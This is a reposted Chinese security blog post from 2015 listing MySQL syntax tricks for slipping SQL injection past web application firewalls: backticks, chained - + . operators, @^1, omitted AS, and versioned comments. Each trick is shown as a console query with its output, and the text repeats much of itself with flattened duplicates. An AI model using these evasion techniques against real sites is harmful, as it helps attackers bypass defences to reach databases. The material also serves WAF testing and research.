WAF绕过的技巧
2015-06-01 16:30
197 查看
研究过国内外的waf。分享一些绝技。
一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重新提及。
以下以Mysql为例讲述这些技巧:
tips1: 神奇的
绕过空格和一些正则匹配。
Default
mysql> select`version`()
-> ;
+----------------------+
| `version`() |
+----------------------+
| 5.1.50-community-log |
+----------------------+
1 row in set (0.00 sec)
Default
mysql> select id from qs_admins where id=1;`dfff and comment it;
+----+
| id |
+----+
| 1 |
+----+
1 row in set (0.00 sec)
usage : where id =’0’`’xxxxcomment on.
Default
mysql> select id from qs_admins;
+----+
| id |
+----+
| 1 |
+----+
1 row in set (0.00 sec)
mysql> select+id-1+1.from qs_admins;
+----------+
| +id-1+1. |
+----------+
| 1 |
+----------+
1 row in set (0.00 sec)
mysql> select-id-1+3.from qs_admins;
+----------+
| -id-1+3. |
+----------+
| 1 |
+----------+
1 row in set (0.00 sec)
(有些人不是一直在说关键字怎么过?过滤一个from ... 就是这样连起来过)
mysql> select@^1.from qs_admins;
+------|+
| @^1. |
+------|+
| NULL |
+------|+
这个是bypass 曾经dedeCMS filter .
mysql> select-count(id)test from qs_admins;
+------|+
| test |
+------|+
| -1 |
+------|+
1 row in set (0.00 sec)
mysql> /\*!40000select\*/ id from qs_admins;
+----+
| id |
+----+
| 1 |
+----+
1 row in set (0.00 sec)
91ri.org小编语:waf现在作为防御入侵者的一道门槛,正在被逐渐的加强。而对绕过这类防护措施的各种技巧的研究也有助于安全研究者进一步认识自身不足,继续奋斗!上述这些想法思维能力真心NB。
好东西更需要分享给大家。
相关文章推荐《利用MySQL隐形类型转换绕过WAF》《通过HTTP参数污染绕过WAF拦截》
link:http://drops.wooyun.org/tips/132 (对原文稍作改动)
原文地址:http://www.91ri.org/6372.html
一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重新提及。
以下以Mysql为例讲述这些技巧:
tips1: 神奇的 (格式输出表的那个控制符)
绕过空格和一些正则匹配。Default
mysql> select`version`()
-> ;
+----------------------+
| `version`() |
+----------------------+
| 5.1.50-community-log |
+----------------------+
1 row in set (0.00 sec)
1 2 3 4 5 6 7 8 | mysql> select`version`() -> ; +----------------------+ | `version`() | +----------------------+ | 5.1.50-community-log | +----------------------+ 1 row in set (0.00 sec) |
一个更好玩的技巧,这个控制符可以当注释符使用(限定条件)。
Default
mysql> select id from qs_admins where id=1;`dfff and comment it;
+----+
| id |
+----+
| 1 |
+----+
1 row in set (0.00 sec)
1 2 3 4 5 6 7 | mysql> select id from qs_admins where id=1;`dfff and comment it; +----+ | id | +----+ | 1 | +----+ 1 row in set (0.00 sec) |
tips2:神奇的- + .
(注意这里是 – + . 三个符号)Default
mysql> select id from qs_admins;
+----+
| id |
+----+
| 1 |
+----+
1 row in set (0.00 sec)
mysql> select+id-1+1.from qs_admins;
+----------+
| +id-1+1. |
+----------+
| 1 |
+----------+
1 row in set (0.00 sec)
mysql> select-id-1+3.from qs_admins;
+----------+
| -id-1+3. |
+----------+
| 1 |
+----------+
1 row in set (0.00 sec)
(有些人不是一直在说关键字怎么过?过滤一个from ... 就是这样连起来过)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | mysql> select id from qs_admins; +----+ | id | +----+ | 1 | +----+ 1 row in set (0.00 sec) mysql> select+id-1+1.from qs_admins; +----------+ | +id-1+1. | +----------+ | 1 | +----------+ 1 row in set (0.00 sec) mysql> select-id-1+3.from qs_admins; +----------+ | -id-1+3. | +----------+ | 1 | +----------+ 1 row in set (0.00 sec) (有些人不是一直在说关键字怎么过?过滤一个from ... 就是这样连起来过) |
tips3: @
Defaultmysql> select@^1.from qs_admins;
+------|+
| @^1. |
+------|+
| NULL |
+------|+
这个是bypass 曾经dedeCMS filter .
1 2 3 4 5 6 7 8 | mysql> select@^1.from qs_admins; +------|+ | @^1. | +------|+ | NULL | +------|+ 这个是bypass 曾经dedeCMS filter . |
tips4:mysql function() as xxx 也可以不用as 和空格
Defaultmysql> select-count(id)test from qs_admins;
+------|+
| test |
+------|+
| -1 |
+------|+
1 row in set (0.00 sec)
1 2 3 4 5 6 7 | mysql> select-count(id)test from qs_admins; +------|+ | test | +------|+ | -1 | +------|+ 1 row in set (0.00 sec) |
tips5:/*![>5000]*/ 新构造 版本号(这个可能有些过时了。)
Defaultmysql> /\*!40000select\*/ id from qs_admins;
+----+
| id |
+----+
| 1 |
+----+
1 row in set (0.00 sec)
1 2 3 4 5 6 7 | mysql> /\*!40000select\*/ id from qs_admins; +----+ | id | +----+ | 1 | +----+ 1 row in set (0.00 sec) |
好东西更需要分享给大家。
相关文章推荐《利用MySQL隐形类型转换绕过WAF》《通过HTTP参数污染绕过WAF拦截》
link:http://drops.wooyun.org/tips/132 (对原文稍作改动)
原文地址:http://www.91ri.org/6372.html
相关文章推荐
- libgsc(Game Server Communication Library)(五)
- 17_css案例.html
- JavaWeb工程中web.xml基本配置
- CronTrigger spring定时任务
- sublime text的Ctrl+alt+up快捷键失效问题解决
- 调用子屏幕
- Android Studio快捷键
- git 解决pull origin 错误 error: The following untracked working tree files would be overwritten by merge
- CronTrigger spring定时任务
- sublime text的Ctrl+alt+up快捷键失效问题解决
- 在HTML中使用JavaScript和CSS
- 配置文件 etc/config/****qos
- infoq上关于微服务的几篇文章
- 16_列表、边框.html
- HIVE动态分区
- 基于平台的标准增删改
- 15_css盒子模型.html
- eclipse提交项目到github
- JAVA 堆排序实现
- FreeSWITCH技巧:notify与message-waiting